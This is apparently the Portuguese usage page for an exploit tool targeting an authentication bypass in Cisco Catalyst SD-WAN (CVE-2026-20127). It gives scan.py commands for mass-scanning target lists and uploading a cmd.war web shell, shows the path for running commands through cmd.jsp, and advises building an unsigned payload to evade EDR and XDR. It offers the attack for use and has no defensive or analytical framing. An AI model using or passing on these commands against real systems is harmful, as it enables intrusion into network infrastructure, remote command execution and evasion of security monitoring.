
exploit para a vulnerabilidade de bypass de autenticação do Cisco Catalyst SD-WAN (CVE-2026-20127)
Exploit EXP para a vulnerabilidade de bypass de autenticação do Cisco Catalyst SD-WAN (CVE-2026-20127)
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
Após a reprodução bem-sucedida da vulnerabilidade, acesse /cmd.gz/cmd.jsp?cmd=whoami e o resultado será exibido na página
Se precisar trocar por um webshell, crie seu próprio pacote WAR (recomenda-se usar um payload sem assinatura, pois testes mostraram que sistemas Windows podem ter EDR ou XDR)